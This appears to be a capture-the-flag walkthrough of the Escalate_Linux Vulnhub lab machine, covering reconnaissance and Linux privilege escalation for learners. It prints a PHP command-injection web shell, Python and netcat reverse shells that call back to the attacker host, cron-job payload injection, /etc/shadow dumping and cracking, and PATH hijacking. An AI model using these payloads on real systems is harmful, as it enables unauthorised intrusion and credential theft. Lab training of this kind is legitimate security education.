The escalate_linux walkthrough is the vulnhub machine you need to be doing as a beginner ethical hacker to learn Linux privilege escalation. Escalate_Linux level 1 is a vulnhub virtual machine that boasts 12 different ways to reach root access through leveraging a variety of privilege escalation techniques. It is designed purposefully to showcase different ways to escalate privileges on a Linux host. Overall it is a great exercise due to the variety and scope of the steps needed to fully exploit the machine’s security controls.
Interested in learning Malware Analysis? Read the famous tutorial How to Setup A Malware Analysis Lab At Home In 5 Steps!
Here is an overview of what privilege escalation techniques are used in this tutorial:
- SUID/GUID Files Exploitation
- Vim/Nano Escape
- Crontab Exploitation
- Weak Passwords Cracking
- Kernel Exploits
- Adding New Users to /etc/passwd
Table of Contents
Here’s What You Need
- Escalate_Linux Level 1 Virtual Machine from vulnhub (VirtualBox)
- Kali Linux Virtual Machine (VirtualBox)
Information Gathering -escalate_linux walkthrough
Start with an nmap scan.
Dirb Running dirb unfortunately does not return anything useful. Upon visiting the exposed endpoints on the apache server there is nothing to go off of at this point.
Gobuster Running gobuster is like pulling out the big guns. It is a recon tool written in go so you know it is fast since it is compiled. And it turns out that this is the trick to finding interesting endpoints on the web server. These are worth investigating.
I run the following using gobuster. Note that the x flag means to search for the following file extensions, php and html.
gobuster dir -w /usr/share/wordlist/seclists/Discovery/Web-Content/common.txt -u http://10.0.2.18 -x .php,.html
Web Exploitation
Going off the exposed endpoint on the web server found through using gobuster, 10.0.2.18/shell.php I find there is a command injection vulnerability. This means that I can run commands as a parameter based on the shell present on the web server. So apparently this works
10.0.2.18/shell.php?cmd=ifconfig; ping 10.0.2.18
The reason this is possible is because of the shell.php file. The apache web server is hosting this PHP shell oneliner as shown below.
?php system($_GET['cmd']); echo '/*pass cmd as get parameter*/' ?
Now why is that? Think about it, netcat may not be installed purposefully on the remote machine! But maybe Python is?
http://10.0.2.18/shell.php?cmd=ifconfig;python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.2.17",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
And guess what? Boom! This accomplishes getting a reverse shell back to my Kali machine and it did not use meterpreter.This is important for those preparing for the OSCP exam which prohibits its use significantly.
The next step is to upgrade to a fully functional shell by using Python’s pty module to spawn a bash shell.
python -c 'import pty; pty.spawn("/bin/bash")'
One of the first objectives is to upload tools to the remote host in order to escalate privileges. The first thing I find out is that I do not have write access to the home directory of user5. I try writing to /var/tmp and it goes off without a hitch.
cd /var/tmp
wget http://10.0.2.17:8000/LinEnum.sh
chmod 777 LinEnum.sh
./LinEnum.sh >> lin-enum-output.txt
AutoRecon – escalate_linux walkthrough
AutoRecon is the premiere automated scanning tool that I use often. As one uses it you come to see the convenience that it offers by organizing the artifacts for each host that you will find. Organization can be become difficult and confusing as a full enumeration and exploitation goes on over multiple hosts.
The report directory contains some auto-generated files and directories that are useful for reporting:
github.com/tib3rius/AutoRecon
local.txt can be used to store the local.txt flag found on targets.
notes.txt should contain a basic template where you can write notes for each service discovered.
proof.txt can be used to store the proof.txt flag found on targets.
[*] http found on tcp/80.
[*] rpcbind found on tcp/111.
[*] netbios-ssn found on tcp/139.
[*] netbios-ssn found on tcp/445.
[*] nfs_acl found on tcp/2049.
[*] nlockmgr found on tcp/42977.
[*] mountd found on tcp/43747.
[*] mountd found on tcp/44203.
[*] mountd found on tcp/60243.
[*] netbios-ns found on udp/137.
LinEnum – escalate_linux walkthrough
To run LinEnum on the remote machine I start a Python web server by python -m SimpleHTTPServer 8000. Then using wget I grab the file and write it /var/tmp folder.
Kernel Kernel information is shown here. There is most likely a kernel exploit available for this machine.
SUID The output for SUID files is shown here. There are a few interesting items that I will definitely look into as a way to escalate privileges.
RW Permisisons The world-writable files are shown below. These are the files that any authenticated user can read and write to. I can also see that gcc, wget, and netcat are installed. These will be needed for any kernel exploits as well as being useful in transferring files to the machine from Kali.
Crontab The scheduled cron jobs are shown below. There is certainly enough information to warrant attempting to exploit cronjobs here.
NFS Enumeration – escalate_linux walkthrough
I notice there are several mountd services running and an nfs service running. Ultimately these prove to be fruitless in pursuit of a shell.
mount -t nfs 10.0.2.18:/ /mnt/el1/
mount: /mnt/el1: bad option; for several filesystems (e.g. nfs, cifs) you might need a /sbin/mount.<type> helper program.
This error is solved by installing the right helper utilities with an apt -y install nfs-common.
$ mount -t nfs 10.0.2.18:/ /mnt -o nolock
mount: /mnt: bad option; for several filesystems (e.g. nfs, cifs) you might need a /sbin/mount.<type> helper program.
$ apt-get install cifs-utils
After installing a wrapper package for NFS on linux I mount the remote NFS share and continue to search for an entry point. This means I have successfully mounted the remote filesystem “/” to my local /mnt directory.
# get the wrapper program
$ sudo apt-get install nfs-common
# mount the remote share
$ mount -t nfs 10.0.2.18:/ /mnt -o nolock
# confirm that the share is mounted locally on /mnt
$ df -k
Filesystem 1K-blocks Used Available Use% Mounted on
udev 1502808 0 1502808 0% /dev
tmpfs 305092 9584 295508 4% /run
/dev/sda1 79980100 32362584 43511740 43% /
tmpfs 1525452 4080 1521372 1% /dev/shm
tmpfs 5120 0 5120 0% /run/lock
tmpfs 1525452 0 1525452 0% /sys/fs/cgroup
Downloads 244912536 216949828 27962708 89% /media/sf_Downloads
tmpfs 305088 16 305072 1% /run/user/130
tmpfs 305088 44 305044 1% /run/user/0
/dev/sr0 83904 83904 0 100% /media/cdrom0
10.0.2.18:/ 226639488 5988480 209068800 3% /mnt
SMB Enumeration – escalate_linux walkthrough
Enum4Linux
S-1-5-32-544 BUILTIN\Administrators (Local Group)
S-1-5-32-545 BUILTIN\Users (Local Group)
S-1-5-32-546 BUILTIN\Guests (Local Group)
S-1-5-32-547 BUILTIN\Power Users (Local Group)
S-1-5-32-548 BUILTIN\Account Operators (Local Group)
S-1-5-32-549 BUILTIN\Server Operators (Local Group)
S-1-5-32-550 BUILTIN\Print Operators (Local Group)
One of the best things about enum4linux is that it can enumerate the users found in SMB shares which should be active accounts on the machine.
====================================================================
| Users on 10.0.2.18 via RID cycling (RIDS: 500-550,1000-1050) |
============================================================
S-1-22-1-1000 Unix User\user1 (Local User)
S-1-22-1-1001 Unix User\user2 (Local User)
S-1-22-1-1002 Unix User\user3 (Local User)
S-1-22-1-1003 Unix User\user4 (Local User)
S-1-22-1-1004 Unix User\user5 (Local User)
S-1-22-1-1005 Unix User\user6 (Local User)
S-1-22-1-1006 Unix User\user7 (Local User)
S-1-22-1-1007 Unix User\user8 (Local User)
After successfully enumerating some user accounts on the machine I attempt to connect to the shares that I have just enumerated. Ultimately there is nothing to gain from this attempt, so I press forward to more enumeration.
Using smbclient I connect to some of the open shares such as ipc$ and liteshare, but these are not anything remarkable either.
smbclient \\\\10.0.2.18\\ipc$
Enter WORKGROUP\root's password:
Try "help" to get a list of possible commands.
smb: \>
Looking for SUID/GUID Files
The first step in Linux privilege escalation is to check for files with the SUID/GUID bit set. This means that the file or files can be run with the permissions of the file(s) owner/group. That means that the Which leads to finding that the file script is executable by my current user.
$ find / -perm -u=s -type f 2>/dev/null
/home/user5/script
/home/user3/shell
-rwsr-xr-x 1 root root 8392 Jun 4 15:57 script
Running the file does not appear to lead to anything of consequence so I press on.
Which leads me to try the other interesting file which is shell.
1. Abusing SUID/GUID Files
The first way to escalate privileges to root is simple. Finding this is done by looking through directories naturally for interesting files. But LinEnum has already done that and revealed all the SUID/GUID files. One of them is shell found in a user’s directory. Running it opens a bash shell running as root.
2. Exploiting Weak Passwords
With root access I now look to start cracking passwords. To do this I list the usernames with cat /etc/passwd and then list out the passwords with cat /etc/shadow. The final step is to run john on the hashes to crack them locally on my Kali machine. The resulting password to root is 12345.
3. Exploit Cronjobs
Notice that the file autoscript.sh is scheduled to run every five minutes. It is owned by root, meaning that it will run with root privileges. This file is also writeable by root of course, which I am. The task then is to create a command that will return a shell and paste it in this file. When the file runs again in five minutes the shell will be running as root. Thereby a root shell is accomplished in this way.
$ msfvenom -p cmd/unix/reverse_netcat LHOST=10.0.2.17 LPORT=443 -f raw
$ echo 'mkfifo /tmp/znaiyl; nc 10.0.2.17 443 0</tmp/znaiyl | /bin/sh >/tmp/znaiyl 2>&1; rm /tmp/znaiyl' >> autoscript.sh
4. Exploiting the /etc/passwd File
In Linux when a new user is created an entry is made in /etc/passwd, /etc/group, and /etc/shadow. The latter contains the encrypted password of the user. In order to abuse this process for escalating privileges one needs write access to /etc/passwd. After inital escalation upon running shell or upon cracking the password of root, this is now possible as root has permission to edit /etc/passwd.
# generate a new password using Openssl
$ openssl passwd guru iamguru
The new user entry will be a complete string of guru:$gurupassword:0:0:/root/root:/bin/bash
5. Escaping vim Editor for Priv Esc
The output from LinEnum from initial enumeration reveals that user8 can run vi with root privileges. Notice that this is perfect for escaping vim in order to escalate privileges.
To escape from within vim in order to escalate privileges is to run sudo vi and from there to run :!sh to open a root bash shell.
6. Exploiting PATH Variables
Another way to abuse the SUID files in this directory is to abuse script. Since initial enumeration reveals that the file runs with root privileges a new file with the same name can lead to a root shell.
# could do this but
echo 'cat /etc/shadow' >> script
chmod 777 script
./script
The above is possible but instead of overwriting files, this is the non-destructive method to employ instead. The commands shown below will list the contents of /etc/shadow. From there the password can be cracked and I can switch to root.
echo 'cat /etc/shadow' >> ls
chmod 777 ls
export PATH=/var/tmp:$PATH
cd /home/user5
./script